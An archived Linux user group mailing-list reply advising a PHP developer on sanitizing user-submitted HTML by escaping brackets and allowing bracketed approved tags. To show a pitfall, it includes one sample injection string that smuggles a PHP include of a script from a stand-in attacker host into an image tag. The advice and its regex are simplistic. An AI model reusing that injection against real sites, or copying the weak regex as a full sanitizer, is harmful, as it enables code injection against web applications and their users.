TCLUG Archive
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [TCLUG:20490] [OT] Regexp and HTML sanitization



> I'm developing a web application with PHP and MySQL for data entry. I need
> to "sanitize" the HTML that my users enter (i.e. remove all HTML tags
> except for BR, P, IMG, etc.). I've been trying to use a regular expression
> to do this, but it's not working yet. Anyone have any suggestions? If I
> can't do it in a single regular expression, it makes the code rather
> complex.


If you want to do it simply, you might be better off borrowing a strategy from
UBB -- remove *all* HTML codes (or globally convert < and > to &lt; and &gt;),
convert newlines to <BR>, and give your users the option to use "approved" tags
by enclosing them in square brackets or something.

i.e. [IMG="/path/to/image"] is easily handled by

$output=preg_replace("/\[IMG (.+)\]/", "<IMG \\1>", $input)

(This *only* works if you globally replace brackets *first* -- otherwise, a
clever user could do something like "[IMG SRC="whocares.gif"><? include
"http://hax0r.com/some.random.js ?]")

Trying to do it all in a single regexp may not be a good thing, as you'll almost
certainly have to edit that regexp over time, and it's much easier to deal with
a lot of simple regexps than a big complicated one.

Check out the docs on preg_replace() -- there's actually a good recipe for what
you're trying to do right on that page:
http://www.php3.org/manual/function.preg-replace.php  It's much more powerful
than ereg_replace and its relatives.


--
Eric Hillman
UNIX Sysadmin/Webmaster
City & County Credit Union
ehillman@cccu.com